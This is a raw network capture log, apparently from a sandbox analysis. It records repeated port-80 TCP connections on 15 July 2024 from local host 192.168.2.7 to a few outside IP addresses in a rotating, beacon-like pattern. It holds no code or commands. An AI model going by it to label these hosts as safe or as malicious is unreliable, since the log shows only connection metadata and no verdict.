Jul 15, 2024 12:43:15.634980917 CEST	80	54497	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:15.635901928 CEST	80	54498	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:15.635988951 CEST	54498	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:15.636305094 CEST	54498	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:15.641516924 CEST	80	54498	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:16.226701021 CEST	80	54498	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:16.226979017 CEST	54498	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:16.239916086 CEST	80	54498	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:16.240113020 CEST	54498	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:38.152179956 CEST	54499	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.157402039 CEST	80	54499	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:38.157495975 CEST	54499	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.157838106 CEST	54499	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.162755013 CEST	80	54499	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:38.190393925 CEST	54500	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.206331968 CEST	80	54500	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:38.206754923 CEST	54500	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.207376003 CEST	54500	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:38.212217093 CEST	80	54500	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:39.890750885 CEST	80	54499	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:39.890842915 CEST	54499	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:39.890924931 CEST	54499	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:39.892760992 CEST	54501	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.895724058 CEST	80	54499	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:39.897574902 CEST	80	54501	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:39.897643089 CEST	54501	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.898102045 CEST	54501	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.903450012 CEST	80	54501	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:39.936090946 CEST	80	54500	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:39.936177969 CEST	54500	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:39.936265945 CEST	54500	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:39.937818050 CEST	54502	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.941088915 CEST	80	54500	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:39.943072081 CEST	80	54502	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:39.943136930 CEST	54502	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.943403959 CEST	54502	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:39.948224068 CEST	80	54502	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:41.642713070 CEST	80	54501	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:41.642843962 CEST	54501	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:41.642931938 CEST	54501	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:41.644753933 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.651709080 CEST	80	54501	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:41.653950930 CEST	80	54503	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:41.654074907 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.654649973 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.659400940 CEST	80	54503	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:41.688859940 CEST	80	54502	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:41.688942909 CEST	54502	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:41.689059019 CEST	54502	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:41.690026999 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.693890095 CEST	80	54502	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:41.695003986 CEST	80	54504	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:41.695080042 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.695380926 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:41.700534105 CEST	80	54504	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.542470932 CEST	80	54503	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.542495012 CEST	80	54504	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.542609930 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.542609930 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.542723894 CEST	80	54503	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.542728901 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.542728901 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.542788029 CEST	54503	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.542825937 CEST	80	54504	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.543019056 CEST	54504	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:43.543720007 CEST	54505	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.543773890 CEST	54506	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.552037001 CEST	80	54503	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.564830065 CEST	80	54504	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:43.564846039 CEST	80	54505	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:43.564851999 CEST	80	54506	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:43.564966917 CEST	54505	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.565233946 CEST	54506	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.565233946 CEST	54506	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.565401077 CEST	54505	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:43.569987059 CEST	80	54506	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:43.570338964 CEST	80	54505	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:45.193074942 CEST	80	54505	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:45.193236113 CEST	54505	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:45.193449020 CEST	54505	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:45.195810080 CEST	54507	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.197247028 CEST	80	54506	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:45.197557926 CEST	54506	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:45.197557926 CEST	54506	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:45.198266029 CEST	80	54505	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:45.199492931 CEST	54508	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.200576067 CEST	80	54507	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.200731993 CEST	54507	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.201900005 CEST	54507	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.202452898 CEST	80	54506	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:45.207835913 CEST	80	54508	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.207936049 CEST	54508	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.208512068 CEST	80	54507	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.208811998 CEST	54508	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.213789940 CEST	80	54508	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.793064117 CEST	80	54507	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.793311119 CEST	54507	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.799690962 CEST	80	54507	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.799806118 CEST	54507	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.817708969 CEST	80	54508	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.817981005 CEST	54508	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:45.823571920 CEST	80	54508	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:45.823645115 CEST	54508	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:46.225950956 CEST	54509	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:46.230856895 CEST	80	54509	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:46.230974913 CEST	54509	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:46.231278896 CEST	54509	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:46.236135960 CEST	80	54509	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:48.019968033 CEST	80	54509	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:48.020121098 CEST	54509	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:48.020418882 CEST	54509	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:43:48.022722960 CEST	54510	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:48.025234938 CEST	80	54509	195.2.70.38	192.168.2.7
Jul 15, 2024 12:43:48.027870893 CEST	80	54510	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:48.028067112 CEST	54510	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:48.028928041 CEST	54510	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:48.033727884 CEST	80	54510	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:49.766882896 CEST	80	54510	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:49.767008066 CEST	54510	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:49.767071009 CEST	54510	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:43:49.768027067 CEST	54511	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:49.772144079 CEST	80	54510	91.142.74.28	192.168.2.7
Jul 15, 2024 12:43:49.772882938 CEST	80	54511	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:49.772957087 CEST	54511	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:49.773189068 CEST	54511	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:49.778026104 CEST	80	54511	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:51.395389080 CEST	80	54511	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:51.395469904 CEST	54511	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:51.395556927 CEST	54511	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:43:51.397217035 CEST	54512	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:51.400367975 CEST	80	54511	77.238.224.56	192.168.2.7
Jul 15, 2024 12:43:51.402091026 CEST	80	54512	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:51.402156115 CEST	54512	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:51.402601004 CEST	54512	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:51.407989979 CEST	80	54512	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:53.023745060 CEST	80	54512	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:53.023860931 CEST	54512	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:53.023989916 CEST	54512	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:43:53.024888039 CEST	54513	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:53.028729916 CEST	80	54512	77.238.229.63	192.168.2.7
Jul 15, 2024 12:43:53.029722929 CEST	80	54513	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:53.029792070 CEST	54513	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:53.030189037 CEST	54513	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:53.034965992 CEST	80	54513	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:53.640449047 CEST	80	54513	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:53.640840054 CEST	54513	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:43:53.646606922 CEST	80	54513	77.238.250.123	192.168.2.7
Jul 15, 2024 12:43:53.646697998 CEST	54513	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:15.799496889 CEST	54514	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.804723024 CEST	80	54514	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:15.804856062 CEST	54514	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.805043936 CEST	54514	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.809887886 CEST	80	54514	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:15.822024107 CEST	54515	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.826934099 CEST	80	54515	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:15.827018976 CEST	54515	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.827207088 CEST	54515	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:15.832048893 CEST	80	54515	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:17.529881001 CEST	80	54514	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:17.530071020 CEST	54514	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:17.530148983 CEST	54514	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:17.531392097 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.534970999 CEST	80	54514	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:17.536263943 CEST	80	54516	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:17.536380053 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.536653996 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.541400909 CEST	80	54516	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:17.562304020 CEST	80	54515	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:17.563319921 CEST	54515	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:17.563319921 CEST	54515	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:17.563319921 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.571275949 CEST	80	54515	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:17.571319103 CEST	80	54517	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:17.571496010 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.572118998 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:17.578437090 CEST	80	54517	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.454421997 CEST	80	54516	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.454485893 CEST	80	54517	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.454488039 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.454539061 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.454583883 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.454612970 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.455616951 CEST	54518	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.455698967 CEST	54519	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.683482885 CEST	80	54516	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.683614016 CEST	80	54517	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.683670998 CEST	54517	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.683712006 CEST	54516	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:19.685385942 CEST	80	54516	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.685415030 CEST	80	54517	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:19.685450077 CEST	80	54518	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:19.685478926 CEST	80	54519	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:19.685524940 CEST	54518	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.685554028 CEST	54519	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.685894012 CEST	54518	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.685962915 CEST	54519	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:19.691102028 CEST	80	54518	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:19.691137075 CEST	80	54519	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:21.301425934 CEST	80	54519	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:21.301496029 CEST	54519	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:21.301580906 CEST	54519	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:21.302411079 CEST	54520	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.306457996 CEST	80	54519	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:21.307270050 CEST	80	54520	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:21.307347059 CEST	54520	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.307549000 CEST	54520	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.314110041 CEST	80	54520	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:21.325226068 CEST	80	54518	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:21.325309038 CEST	54518	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:21.325392962 CEST	54518	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:21.325989962 CEST	54521	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.332348108 CEST	80	54518	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:21.332603931 CEST	80	54521	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:21.332746029 CEST	54521	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.332927942 CEST	54521	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:21.338618994 CEST	80	54521	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:22.908461094 CEST	80	54520	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:22.908582926 CEST	54520	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:22.908718109 CEST	54520	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:22.909842968 CEST	54522	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.913474083 CEST	80	54520	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:22.914824963 CEST	80	54522	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:22.914940119 CEST	54522	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.915278912 CEST	54522	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.920205116 CEST	80	54522	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:22.940701962 CEST	80	54521	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:22.940805912 CEST	54521	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:22.940929890 CEST	54521	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:22.942183018 CEST	54523	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.947365046 CEST	80	54521	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:22.949160099 CEST	80	54523	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:22.949254990 CEST	54523	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.949750900 CEST	54523	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:22.955744982 CEST	80	54523	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:23.517585039 CEST	80	54522	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:23.518130064 CEST	54522	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:23.523583889 CEST	80	54522	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:23.523714066 CEST	54522	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:23.544429064 CEST	80	54523	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:23.544891119 CEST	54523	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:23.550347090 CEST	80	54523	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:23.550422907 CEST	54523	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:23.656713009 CEST	54524	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:23.661825895 CEST	80	54524	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:23.661969900 CEST	54524	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:23.662302971 CEST	54524	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:23.667359114 CEST	80	54524	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:25.405992031 CEST	80	54524	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:25.406398058 CEST	54524	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:25.406570911 CEST	54524	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:25.407640934 CEST	54525	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:25.411506891 CEST	80	54524	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:25.414275885 CEST	80	54525	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:25.414386034 CEST	54525	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:25.415981054 CEST	54525	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:25.420874119 CEST	80	54525	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:27.158507109 CEST	80	54525	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:27.158613920 CEST	54525	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:27.158792973 CEST	54525	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:27.159985065 CEST	54526	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:27.164593935 CEST	80	54525	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:27.164843082 CEST	80	54526	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:27.164931059 CEST	54526	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:27.165242910 CEST	54526	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:27.170520067 CEST	80	54526	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:28.847867012 CEST	80	54526	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:28.847956896 CEST	54526	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:28.848047018 CEST	54526	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:28.849055052 CEST	54527	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:28.852895021 CEST	80	54526	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:28.853899956 CEST	80	54527	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:28.853975058 CEST	54527	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:28.854330063 CEST	54527	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:28.859157085 CEST	80	54527	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:30.479326963 CEST	80	54527	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:30.479563951 CEST	54527	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:30.479823112 CEST	54527	80	192.168.2.7	77.238.229.63
Jul 15, 2024 12:44:30.480995893 CEST	54528	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:30.484630108 CEST	80	54527	77.238.229.63	192.168.2.7
Jul 15, 2024 12:44:30.485829115 CEST	80	54528	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:30.485920906 CEST	54528	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:30.486408949 CEST	54528	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:30.491225004 CEST	80	54528	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:31.088643074 CEST	80	54528	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:31.089263916 CEST	54528	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:31.094677925 CEST	80	54528	77.238.250.123	192.168.2.7
Jul 15, 2024 12:44:31.097264051 CEST	54528	80	192.168.2.7	77.238.250.123
Jul 15, 2024 12:44:53.521085978 CEST	54529	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.526190996 CEST	80	54529	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:53.526312113 CEST	54529	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.526601076 CEST	54529	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.531368017 CEST	80	54529	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:53.543692112 CEST	54530	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.548535109 CEST	80	54530	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:53.548655987 CEST	54530	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.548861980 CEST	54530	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:53.553714037 CEST	80	54530	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:55.287532091 CEST	80	54529	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:55.287734032 CEST	54529	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:55.287834883 CEST	54529	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:55.289402008 CEST	54531	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.292795897 CEST	80	54529	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:55.294675112 CEST	80	54531	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:55.294759035 CEST	54531	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.294971943 CEST	54531	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.300786018 CEST	80	54530	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:55.300867081 CEST	54530	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:55.300932884 CEST	54530	80	192.168.2.7	195.2.70.38
Jul 15, 2024 12:44:55.301039934 CEST	80	54531	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:55.301841021 CEST	54532	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.306668997 CEST	80	54530	195.2.70.38	192.168.2.7
Jul 15, 2024 12:44:55.306680918 CEST	80	54532	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:55.306778908 CEST	54532	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.307051897 CEST	54532	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:55.312258959 CEST	80	54532	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:57.029558897 CEST	80	54531	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:57.029736996 CEST	54531	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:57.029941082 CEST	54531	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:57.031042099 CEST	54533	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.034817934 CEST	80	54531	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:57.036844969 CEST	80	54533	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:57.036990881 CEST	54533	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.037718058 CEST	54533	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.046973944 CEST	80	54533	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:57.050820112 CEST	80	54532	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:57.050920010 CEST	54532	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:57.051187038 CEST	54532	80	192.168.2.7	91.142.74.28
Jul 15, 2024 12:44:57.053361893 CEST	54534	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.056026936 CEST	80	54532	91.142.74.28	192.168.2.7
Jul 15, 2024 12:44:57.058248997 CEST	80	54534	77.238.224.56	192.168.2.7
Jul 15, 2024 12:44:57.058367968 CEST	54534	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.058747053 CEST	54534	80	192.168.2.7	77.238.224.56
Jul 15, 2024 12:44:57.063500881 CEST	80	54534	77.238.224.56	192.168.2.7
